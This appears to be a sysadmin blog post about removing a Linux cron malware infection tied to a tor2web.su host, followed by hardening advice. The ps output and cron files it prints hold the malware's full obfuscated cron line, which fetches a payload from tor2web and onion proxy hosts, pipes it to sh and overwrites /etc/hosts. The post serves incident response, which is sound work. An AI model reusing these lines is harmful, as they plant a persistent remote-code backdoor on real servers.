Categories
Uncategorized

[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux

1. Malicious Processes

A. Identify the processes and the its URL name, in below case its an7kmd2wp4xo7hpr.tor2web.su
B. Use command ps aux

root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d

2. Malicious Crons

A. Now use the same URL name and grep it in whole server
B. Command is below
[[email protected] ~]# grep -rli an7kmd2wp4xo7hpr    /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab

[[email protected] ~]# cat /etc/cron.d/root
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

[[email protected] ~]# cat /etc/crontab
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

 

Solutions:-

A. Remove the malicious codes from crons or wherever you find and for the time being, put chattr on them as well
B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab
C.
- Change root password instantly
- Remove all Authorized keys from all users which is not yours

ls -lahd /home/*/.ssh/auth*
ls -lahd /root/.ssh/auth*

- ClamAV - Antivirus
- Maldet - Malware Detector
- Restricting SSH from particular IPs/VPN
- Restricting MySQL from particular IPs/VPN
- CSF Firewall
- LFD Login Failure Daemon
- WAF Web Application Firewall
- ModSecurity with HTTP/Apache
- Avoid using MySQL root user pass in Application code and create a non root mysql user.
- Proper permissions and ownership of code files like of 755 for dirs and 644 for files.
- Non standard SSH port

 

Leave a Reply